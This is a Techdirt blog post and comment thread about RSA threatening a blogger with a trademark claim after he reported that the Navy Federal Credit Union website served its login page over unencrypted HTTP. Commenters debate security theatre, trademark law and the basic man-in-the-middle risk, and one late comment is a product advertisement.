Reveal Poor Web Security... Have RSA Threaten You With Trademark Infringement

from the not-cool dept

Scott Jarkoff recently discovered a problem with the Navy Federal Credit Union website, in that it allows users to login from an unsecured webpage. That's the type of stuff that we thought pretty much all banks had figured out ages ago. However, what's fascinating is what happened after that. Scott received an angry email from RSA, the well-known security company, who apparently built the NFCU website, claiming trademark infringement and demanding that he take down the post. RSA was upset with the implication that the site was insecure, but rather than either fixing the problem or explaining why the site is actually safe (which they insist), they threaten Scott with a trademark claim because he has a small screenshot of the NFCU website. Doesn't that make you feel secure? Since when is RSA in the business of sweeping security concerns under the rug by threatening those who point out problems with a trademark infringement claim?
Hide this

Thank you for reading this Techdirt post. With so many things competing for everyone’s attention these days, we really appreciate you giving us your time. We work hard every day to put quality content out there for our community.

Techdirt is one of the few remaining truly independent media outlets. We do not have a giant corporation behind us, and we rely heavily on our community to support us, in an age when advertisers are increasingly uninterested in sponsoring small, independent sites — especially a site like ours that is unwilling to pull punches in its reporting and analysis.

While other websites have resorted to paywalls, registration requirements, and increasingly annoying/intrusive advertising, we have always kept Techdirt open and available to anyone. But in order to continue doing so, we need your support. We offer a variety of ways for our readers to support us, from direct donations to special subscriptions and cool merchandise — and every little bit helps. Thank you.

–The Techdirt Team

Filed Under: security, trademark
Companies: navy federal credit union, rsa


Reader Comments

Subscribe: RSS

View by: Time | Thread


  • icon
    Dark Helmet (profile), 13 Aug 2009 @ 9:48am

    Yay for security

    Ok, first of all let me get this out of the way: if my last name was Jarkoff, I would have such an incredible amount of fun with it, it would be astounding. "Hey, Jarkoff, stop Jarking off..."

    Secondly, security has never been about being secure. I know, I'll take a moment while you read that again....got it? Ok, now here's what I mean: security firms in a plethora of specialties (airport security, malware security, bank security, etc.) aren't there PRIMARILY to keep things secure, they're primarily there to create the ILLUSION of security.

    Part of that means doing some real securty work: scanning bags, releasing zero-day pathes, carrying guns in the bank. However, you'll notice that none of that stops the determined criminal. Drug traffickers, weapons, and terrorists still make it on the plane. Malware is still relatively effective in infecting computers. Banks still get robbed with a frequency that would probably surprise the hell out of most people.

    But we fly. We visit websites. We put our money in banks.

    So no worries, little sheeple. Trust the establishment: you're safe.

    link to this | view in chronology ]

    • icon
      Dark Helmet (profile), 13 Aug 2009 @ 10:00am

      Re: Yay for security

      I just noticed that I forgot to round out the entire point with my final statement in relation to the article:

      Obviously this has nothing to do with trademark. This Jarkoff (hahahaahha) is messing with RSA's created illusion of security....

      link to this | view in chronology ]

      • icon
        The Infamous Joe (profile), 13 Aug 2009 @ 10:11am

        Re: Re: Yay for security

        Rants can do that, I'm told.

        In regard to your point, while I agree that much of security if based on *feeling secure* instead of actually *being secure* (I'm looking at you, Every-Airport-In-America!) I think that another side of it is that "Security" is a constant, on-going battle. Also, there needs to be a balance of usuablity and convienence when regarding security. Your house would be pretty damn secure if it had no doors or windows, but it wouldn't be a very useful house.

        With that in mind, I wouldn't freak out about a flaw discovered in my bank's online site as long as it was quickly patched instead of hushed up-- If I were NavyFCU, I'd look for someone else to build my website, pronto.

        link to this | view in chronology ]

    • identicon
      Anonymous Coward, 13 Aug 2009 @ 10:08am

      Re: Yay for security

      On the other hand, the illusion of security is far more effective at creating safety than actual security.

      Banks don't care about getting robbed. A few thousand dollars stolen won't shut a bank down, but customers scared to make bank deposits will.

      Most malware is only found through extensive use of computers and after a large number of infections (just like a biological disease), and malware security is most effective when a problem has already been discovered. If everyone was afraid of getting infected, the chances of discovering issues would be less and less.

      And on a more pessimistic note, the more people that fly on airplanes, the safer you personally will be. Granted, if very few people used airplanes, then security would be more effective...but since that extreme isn't possible, the other extreme ends up being almost as good.

      link to this | view in chronology ]

    • identicon
      johnboy, 25 Jan 2011 @ 11:22am

      Re: Yay for security

      would like to see stats on how "secure " the web really is or as I feel "is not" Can someone tell me who is legally liable for "web security? How safe are bank and credit card
      security systems. Seems as thought "idenity theft" is rampant or at minimum not very risky for hacker crooks!

      link to this | view in chronology ]

  • icon
    The Infamous Joe (profile), 13 Aug 2009 @ 9:54am

    So..

    So The RSA is alleging that Scott is trying to start a Credit Union called Navy Federal Credit Union and it might mislead some customers?

    Or.. is that not what trademarks are for these days?

    link to this | view in chronology ]

    • icon
      Sean T Henry (profile), 13 Aug 2009 @ 10:36am

      Re: So..

      Also, I would assume that RSA was contracted to create the site. So if it was created under contract the completed work would be the property of the Navy Federal Credit Union, and it would be NFCC who could claim infringement. RSA does not own said website just created it.

      link to this | view in chronology ]

    • icon
      chris (profile), 13 Aug 2009 @ 12:39pm

      Re: So..

      Or.. is that not what trademarks are for these days?

      trademark might have been used to help consumers in like the 60's or something, but today copyright and trademark are about stifling free speech.

      you use trademark and copyright to force people to remove content that you don't like.

      link to this | view in chronology ]

  • identicon
    Lonzo5, 13 Aug 2009 @ 9:55am

    The thing that gets me is: RSA will actually pay lawyers to defend this if it goes to court. Disquieting. Do they even care how this makes them look?

    link to this | view in chronology ]

  • identicon
    This is getting f***king rediculous, 13 Aug 2009 @ 9:57am

    Seriously.

    Screenshots should NOT be trademark infringement. It's so stupid I can't even begin to rant about it.

    This just furthers my already existing hatred for stupid people.

    link to this | view in chronology ]

  • identicon
    Paul Brinker, 13 Aug 2009 @ 10:05am

    Navy Fed Customer

    As a Customer I am not happy at all at this event, I worry a lot because most of Navy Fed's services can be done via its web portal with no face time (its main customers are military)

    So yes, I would be really mad if this got out and was not fixed.

    link to this | view in chronology ]

  • icon
    barrenwaste (profile), 13 Aug 2009 @ 10:05am

    Re: Lonzo5

    The truly stupid thing is, it's all image related, Lonzo. The only legal way they could get him for trademark infringement is if they claim his use of thier name endorsed or improved marketing of his product. In other words, they don't want to be associated with or potentially endorsing thier own screw up. To top it all off, legaly there is no way they can win the case on these grounds, and I am certain they know that.

    link to this | view in chronology ]

  • identicon
    Jess, 13 Aug 2009 @ 10:14am

    Printscreen

    I say Microsoft should be sued for allowing the print screen key to allow for the possibility of trademark infringement

    :)

    -J

    link to this | view in chronology ]

  • identicon
    Greg, 13 Aug 2009 @ 10:37am

    Well, I guess this is the first time I've ever actually been glad I moved all my accounts out of NFCU.

    link to this | view in chronology ]

  • identicon
    Trails, 13 Aug 2009 @ 10:40am

    A technical point

    "explaining why the site is actually safe (which they insist)"

    It's not. It cannot be.

    The page html being sent from the nfcu server to the user's machine is sent in the clear, and subject to man-in-the-middle injection attacks.

    The request upon login, going from the user's machine to nfcu server is encrypted, but that's shutting the barn door after the horses have run off.

    I do this stuff for a living, and I can assert that this is a very well known, obvious, exploitable, and basic insecurity. It flouts common best practices, and is stunning in its obviousness. It's a no-brainer for anyone involved in web security.

    link to this | view in chronology ]

    • icon
      Mike Masnick (profile), 13 Aug 2009 @ 10:45am

      Re: A technical point

      It's not. It cannot be.

      Right. I agree. But in the correspondence RSA seemed to insist it was... so I wanted to leave that open to them as an out. But, yeah, it sure looks like this is a really really old and basic mistake.

      link to this | view in chronology ]

      • identicon
        Trails, 13 Aug 2009 @ 11:56am

        Re: Re: A technical point

        I'm not trying to point out a perceived flaw in your article, just adding a technical point.

        link to this | view in chronology ]

      • identicon
        Keven Sutton, 13 Aug 2009 @ 12:29pm

        Re: Re: A technical point

        It's possible to have the log-in page on a HTTP site, fill out the field and have all of the field data sent over HTTPS. that would make the log in safe.
        that being said, if it reverts to http, the the page being displayed afterwards get's cached. which can lead to insecurity. perhaps this is what they meant when they said it was secure anyway.

        Either way, having the log-in page as HTTPS is still a good Idea. It provides a reassurance that the web engineer didn't forget something as simple as making the log-in go over a secure connection.

        link to this | view in chronology ]

        • icon
          Dark Helmet (profile), 13 Aug 2009 @ 12:47pm

          Re: Re: Re: A technical point

          "Either way, having the log-in page as HTTPS is still a good Idea. It provides a reassurance that the web engineer didn't forget something as simple as making the log-in go over a secure connection."

          Kevin, totally NOT saying you're wrong or anything, just asking for an opinion on what you said: doesn't that sound like EXACTLY what I was saying about creating the illusion or appearence of safety being a chief priority?

          [patting self on back]

          link to this | view in chronology ]

          • identicon
            Keven Sutton, 13 Aug 2009 @ 4:46pm

            Re: Re: Re: Re: A technical point

            As far as a User perspective of security, yes; the appearance of security is very important.

            From the other side though, as a bit of a I.T. security specialist (mostly a hobby) There needs to be some substance behind that perceived security. You can create the Illusion of security, but if you try to monetize that illusion it might be successful for a very short period, but will have no long term profitability. If you have High Security and the Illusion of Insecurity, you'll have to fight against people's concepts that you are a poor security solution. (see many open source security solutions, the best thing out there, but because you can see the source code managers who have little understanding of the programs themselves think that they are inherently more insecure.)

            link to this | view in chronology ]

        • icon
          NotFromToronto (profile), 13 Aug 2009 @ 12:49pm

          Re: Re: Re: A technical point

          I work for a large financial services company. I can assure you that having the login page under SSL is more than just a good idea... it's an absolute requirement.

          The problem with an initial page has nothing to do with where it is supposed to post it's contents to. The problem is that because it is sent unsecured, the contents could be altered in-flight, and the posting destination could be changed. If done well, the customer doesn't even know his account details have been compromised.

          Shameful way to deal with this from RSA.

          link to this | view in chronology ]

    • identicon
      Fushta, 13 Aug 2009 @ 11:01am

      Re: A technical point

      Indeed. I think we all agree that the webmaster made a mistake. Mike is pointing out the improper reaction from RSA in going after the guy for trademark infingement.


      Is it being used for commercial purposes? nope


      Is it being used to trick people into thinking the RSA endorses the "exposer?" nope

      link to this | view in chronology ]

  • identicon
    PRMan, 13 Aug 2009 @ 10:56am

    Those who can't innovate, litigate

    I guess RSA is done innovating...

    link to this | view in chronology ]

  • icon
    Overcast (profile), 13 Aug 2009 @ 11:11am

    Streisand Alert:

    Thanks for letting me know, I work for a Fortune 100, and feel obligated to pass on the information - because security for the network I work on is greater than caressing RSA's ego.

    Should have quietly fixed it RSA.

    link to this | view in chronology ]

  • identicon
    Freedom, 13 Aug 2009 @ 1:24pm

    Old School and High Priced...

    This logic just amazes me:

    Public site/public author makes creditable criticism about a relatively high-profile site your company was contracted to make....

    What are your options:

    Option A. Threaten individual author with bogus trademark case. After all, someone that has already gone public won't release our threat letter in a public forum and make the issue worse or anything - nah, definitely not that. Of course, lawyers are cheap as well so this will be a slame dunk - low cost, easy fix - hear no security flaws, see no security flaws - the lawyers can make it all go away! Hmmm.. I wonder if the guy might be right, never mind, legal will take care of it for us!

    Option B. Take two minutes (or more likely with overhead - 4 weeks), fix the initial page so that it is SSL based and take this as an opportunity to show how you handle mistakes in a professional manor.

    Option C. Just ignore it...

    With the economy like it is, I sure hope that the person at RSA that made this decision has some backup options as I wouldn't want to be part of the soon-to-be upcoming meeting on this issue!

    Freedom

    link to this | view in chronology ]

  • icon
    Bobby Boulders (profile), 14 Aug 2009 @ 9:00pm

    WTF everyone? Why does it have to be this way? I have been with Navy Fed for over 12 years. Never ONCE have I had a problem, an issue, or a security concern. Please DON'T make NFCU the bad guy here... If the RSA is gonna be on "A-Hole Mode" then blame RSA. Besides, if NFCU has a security concern, they will take care of it. So STFU you haters and don't worry about MY credit union. They are awesome.

    link to this | view in chronology ]

  • identicon
    magreet, 17 Aug 2009 @ 3:54am

    This information is worthy as I had no idea of posting a comment on the blog.So this one is the blog which I like most,I would like to thanks that master brain who make all this for the readers like me.keep up the good works.

    link to this | view in chronology ]

  • identicon
    Dave, 2 Sep 2009 @ 9:18am

    NFCU ignores us

    I got my first NFCU account almost 40 years ago. I still do most of my banking there. BUT be aware, their only, repeat only claim to fame is to being the largest credit union. They are no where near the best. Indeed, they are simply a marginal organization that has let the world pass them by when it comes to on-line services and a willingness to quickly react to problems and clearly respond to complaint.

    NFCU is now sooooo big, they contract out most of their services just like any other multinational. The layers of management make it almost impossible to get quick resolution to any problems an individual member may have.

    In fact, they have the best "form answer" letters in the business that make it seem they care, when they really just want you to go away. Complain, and they will bluntly tell you something like "moving forward, you need to use the proper" whatever....

    This week, you can hardly get around their web site to do your on-line banking without locking up. I began just today the lengthy process of severing my relation with them. And guess what? They will not even care.

    link to this | view in chronology ]

  • icon
    wadewillson (profile), 21 Feb 2019 @ 6:16am

    Secure Internet Gateway Solutions from Comodo

    Great information..! Here is a similar information i got

    Comodo Dome offers Secure internet gateway the best-in-class security suite with functionalities to identify and prevent all malware types from accessing your network. The Default approach backed by auto-containment technology ensures safety for the user and the data stored on the computer. This prevention mechanism analyzes the unknown files when they are delivered to the users. Comodo Dome Secure Internet Gateway uses a comprehensive technology that is flexible, end-user friendly and easy to set up.

    https://cdome.comodo.com/secure-internet-gateway.php?afid=10110&utm_source=google&utm_me dium=referral&utm_campaign=lookup

    link to this | view in chronology ]


Follow Techdirt
Essential Reading
Techdirt Deals
Report this ad  |  Hide Techdirt ads
Techdirt Insider Discord

The latest chatter on the Techdirt Insider Discord channel...

Loading...
Recent Stories

This site, like most other sites on the web, uses cookies. For more information, see our privacy policy. Got it
Close

Email This

This feature is only available to registered users. Register or sign in to use it.